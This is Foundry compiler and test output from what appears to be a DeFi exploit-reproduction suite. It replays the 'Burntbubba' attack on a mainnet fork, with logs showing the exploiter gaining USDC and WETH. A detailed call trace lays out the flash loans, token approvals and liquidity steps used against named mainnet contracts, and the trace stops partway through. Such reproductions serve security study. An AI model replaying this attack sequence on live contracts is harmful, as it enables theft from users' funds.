Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.28s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-11/Burntbubba_exp.sol:59:5:
   |
59 |     IUSDC private constant USDC = IUSDC(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-11/Burntbubba_exp.sol:60:5:
   |
60 |     IWETH private constant WETH = IWETH(payable(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-11/Burntbubba_exp.sol:106:9:
    |
106 |         address[] calldata tokens,
    |         ^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-11/Burntbubba_exp.sol:108:9:
    |
108 |         uint256[] calldata feeAmounts,
    |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-11/Burntbubba_exp.sol:109:9:
    |
109 |         bytes calldata userData
    |         ^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-11/Burntbubba_exp.sol:117:9:
    |
117 |         address caller,
    |         ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-11/Burntbubba_exp.sol:118:9:
    |
118 |         address erc20Token,
    |         ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-11/Burntbubba_exp.sol:121:9:
    |
121 |         bytes calldata data
    |         ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 551.84ms (1.85ms CPU time)

Ran 1 test for src/test/2023-11/Burntbubba_exp.sol:BurntbubbaExploit
[PASS] testExploit() (gas: 5606354)
Logs:
  Exploiter USDC balance before attack: 0.000000
  Exploiter WETH balance before attack: 0.000000000000000000
  Exploiter USDC balance after attack: 1597.512305
  Exploiter WETH balance after attack: 0.654886372151164260

Traces:
  [35221] BurntbubbaExploit::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 18680254 [1.868e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::addr(<pk>) [staticcall]
    │   └─ ← [Return] toAddr: [0x5192D3Bf56879E953FD483f105975961F736ea8f]
    ├─ [0] VM::label(toAddr: [0x5192D3Bf56879E953FD483f105975961F736ea8f], "toAddr")
    │   └─ ← [Return]
    ├─ [0] VM::label(AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], "AST")
    │   └─ ← [Return]
    ├─ [0] VM::label(SUSHI: [0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], "SUSHI")
    │   └─ ← [Return]
    ├─ [0] VM::label(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], "USDC")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0], "SushiUSDC")
    │   └─ ← [Return]
    ├─ [0] VM::label(FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], "FarmingLPToken")
    │   └─ ← [Return]
    ├─ [0] VM::label(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], "Balancer")
    │   └─ ← [Return]
    ├─ [0] VM::label(SushiSwap: [0xF5BCE5077908a1b7370B9ae04AdC565EBd643966], "SushiSwap")
    │   └─ ← [Return]
    ├─ [0] VM::label(SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], "SushiRouter")
    │   └─ ← [Return]
    ├─ [0] VM::label(AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9], "AST_SUSHI")
    │   └─ ← [Return]
    └─ ← [Stop]

  [6006854] BurntbubbaExploit::testExploit()
    ├─ [2624] AST::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [624] AST::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a])
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [624] AST::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [624] AST::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x00000000000000000000000000000000000000000000000000000000001f78dd)
    │   └─ ← [Return]
    ├─ [624] AST::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 2062557 [2.062e6]
    ├─ [9815] USDC::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Exploiter USDC balance before attack", val: 0, decimals: 6)
    ├─ [2534] WETH::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Exploiter WETH balance before attack", val: 0, decimals: 18)
    ├─ [5696113] Balancer::flashLoan(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [800000000 [8e8], 500000000000000000 [5e17]], 0x)
    │   ├─ [3315] USDC::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [delegatecall]
    │   │   │   └─ ← [Return] 13190610182748 [1.319e13]
    │   │   └─ ← [Return] 13190610182748 [1.319e13]
    │   ├─ [2350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [33517] USDC::transfer(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 800000000 [8e8])
    │   │   ├─ [32728] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 800000000 [8e8]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 800000000 [8e8])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x231554ca30e30e3daf1985a58abe660eac42605fd6c849ff49b261c6a9f01b7d: 0x00000000000000000000000000000000000000000000000000000bff2da2625c → 0x00000000000000000000000000000000000000000000000000000bfefdf35a5c
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000000000000002faf0800
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [2534] WETH::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 51230922249526167342751 [5.123e22]
    │   ├─ [350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [25962] WETH::transfer(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000 [5e17])
    │   │   ├─ emit Transfer(from: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 500000000000000000 [5e17])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000006f05b59d3b20000
    │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x000000000000000000000000000000000000000000000ad93bde40e287320e9f → 0x000000000000000000000000000000000000000000000ad934ede588b3800e9f
    │   │   └─ ← [Return] true
    │   ├─ [5601475] BurntbubbaExploit::receiveFlashLoan([0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [800000000 [8e8], 500000000000000000 [5e17]], [0, 0], 0x)
    │   │   ├─ [5586407] SushiSwap::flashLoan(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], SUSHI: [0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], 400000000000000000000000 [4e23], 0x5f)
    │   │   │   ├─ [30025] SUSHI::transfer(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 400000000000000000000000 [4e23])
    │   │   │   │   ├─ emit Transfer(from: SushiSwap: [0xF5BCE5077908a1b7370B9ae04AdC565EBd643966], to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 400000000000000000000000 [4e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000054b40b1f852bda000000
    │   │   │   │   │   @ 0x665c543999f0cf3a92f4b5af56f9aa8ace16b2da8d7f076cf522abaad51e82df: 0x00000000000000000000000000000000000000000000fd9b8da5d93b60769d1a → 0x00000000000000000000000000000000000000000000a8e78286540f86769d1a
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [5539722] BurntbubbaExploit::onFlashLoan(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], SUSHI: [0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], 400000000000000000000000 [4e23], 200000000000000000000 [2e20], 0x5f)
    │   │   │   │   ├─ [27867] USDC::approve(SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ [27078] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::approve(SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Approval(owner: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x635086ecbe21a86e025d4dbf9d688805b8ca2787b102c9904fb6b86025a0770d: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [24420] WETH::approve(SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ emit Approval(owner: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x0e1c57ed25e62bf0d0077ea192ef13202a82e9097a2348ee5e203245931e43a2: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [24417] AST::approve(SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ emit Approval(owner: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb7b2d76ffd9913762473e3aba6bedeec6042507b489f25504d98dd2700cec087: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [24563] SUSHI::approve(SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ emit Approval(owner: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xcd3497fafbfb091f23164107ea0c57486cde17375ac6d0adb0876f1f3ce8bff1: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [24510] SushiUSDC::approve(FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ emit Approval(owner: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb42dc71227b0725cbe07639a2d90ba4a814094d369940d8b07e389c55d79a322: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [127277] SushiRouter::addLiquidity(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 2000000 [2e6], 1000000000000000 [1e15], 0, 0, BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701297987 [1.701e9])
    │   │   │   │   │   ├─ [2644] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::getPair(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0]
    │   │   │   │   │   ├─ [2517] SushiUSDC::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 7014211105075 [7.014e12], 3445431052926522902177 [3.445e21], 1701296831 [1.701e9]
    │   │   │   │   │   ├─ [12792] USDC::transferFrom(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0], 2000000 [2e6])
    │   │   │   │   │   │   ├─ [11997] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0], 2000000 [2e6]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0], value: 2000000 [2e6])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000000002faf0800 → 0x000000000000000000000000000000000000000000000000000000002f908380
    │   │   │   │   │   │   │   │   @ 0xcd1718b39694c8b71b5b7030a9f4416a979d5bffcde56263723356d0f75e4776: 0x000000000000000000000000000000000000000000000000000006611f8fb133 → 0x000000000000000000000000000000000000000000000000000006611fae35b3
    │   │   │   │   │   │   │   │   @ 0x635086ecbe21a86e025d4dbf9d688805b8ca2787b102c9904fb6b86025a0770d: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe17b7f
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [8225] WETH::transferFrom(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0], 982414415908767 [9.824e14])
    │   │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0], value: 982414415908767 [9.824e14])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb440be4deffff278a0a54bece4d5bba517a3236073012092c2f7526f6434fd2c: 0x0000000000000000000000000000000000000000000000bac6f607f5e97e46a1 → 0x0000000000000000000000000000000000000000000000bac6f9857617c69640
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000006f05b59d3b20000 → 0x00000000000000000000000000000000000000000000000006ecddd9a569b061
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [92110] SushiUSDC::mint(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [1315] USDC::balanceOf(SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0]) [staticcall]
    │   │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 7014213105075 [7.014e12]
    │   │   │   │   │   │   │   └─ ← [Return] 7014213105075 [7.014e12]
    │   │   │   │   │   │   ├─ [534] WETH::balanceOf(SushiUSDC: [0x397FF1542f962076d0BFE58eA045FfA2d347ACa0]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 3445432035340938810944 [3.445e21]
    │   │   │   │   │   │   ├─ [2338] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::feeTo() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x5ad6211CD3fdE39A9cECB5df6f380b8263d1e277
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x5ad6211CD3fdE39A9cECB5df6f380b8263d1e277, value: 1429200789329 [1.429e12])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 25156809832 [2.515e10])
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 7014213105075 [7.014e12], reserve1: 3445432035340938810944 [3.445e21])
    │   │   │   │   │   │   ├─ emit Mint(sender: SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], amount0: 2000000 [2e6], amount1: 982414415908767 [9.824e14])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000000000000005db767468
    │   │   │   │   │   │   │   @ 11: 0x000000000000000000000000000000000004a74ae3bcfd78cea7a6f324a93424 → 0x000000000000000000000000000000000004a7865adef8da760367ea9c764ec0
    │   │   │   │   │   │   │   @ 0xb0167a38c202b4bb6bfd0fcb021cec3a21c77e1f22eef7b7669290e55ab4a89e: 0x0000000000000000000000000000000000000000000000000000037fc8cb831c → 0x000000000000000000000000000000000000000000000000000004cc8bcce26d
    │   │   │   │   │   │   │   @ 0: 0x000000000000000000000000000000000000000000000000013971393629e394 → 0x0000000000000000000000000000000000000000000000000139728bd4a1b74d
    │   │   │   │   │   │   │   @ 8: 0x6567babf0000000000bac6f607f5e97e46a1000000000000000006611f8fb133 → 0x6567bb5b0000000000bac6f9857617c69640000000000000000006611fae35b3
    │   │   │   │   │   │   │   @ 10: 0x000000000000000000000000000000000000347e2fb749a06304fabf959846a4 → 0x000000000000000000000000000000000000347e350b4def4acaa2b3fa363e80
    │   │   │   │   │   │   │   @ 9: 0x0000000000000000000000f9d97e40704de9ed508afb7ddbea2479cb58b822cc → 0x0000000000000000000000f9d99017d7be42cf94d537d1b80c796c91460a44ec
    │   │   │   │   │   │   └─ ← [Return] 25156809832 [2.515e10]
    │   │   │   │   │   └─ ← [Return] 2000000 [2e6], 982414415908767 [9.824e14], 25156809832 [2.515e10]
    │   │   │   │   ├─ [2261515] SushiRouter::addLiquidity(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], 2000000 [2e6], 10000 [1e4], 0, 0, BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701297987 [1.701e9])
    │   │   │   │   │   ├─ [2644] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::getPair(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [2038958] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::createPair(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a])
    │   │   │   │   │   │   ├─ [1884378] → new <unknown>@0xd3A115077FCfD8f9F1734bCD4cAE19994226C131
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 3: 0 → 0x47f0cdcb4f9bcab471a18395033468aee7e9808bd18819d47db034e6470eada9
    │   │   │   │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   │   │   │   @ 5: 0 → 0x000000000000000000000000c0aee478e3658e2610c5f7a4a2e1777ce9e4f2ac
    │   │   │   │   │   │   │   └─ ← [Return] 9079 bytes of code
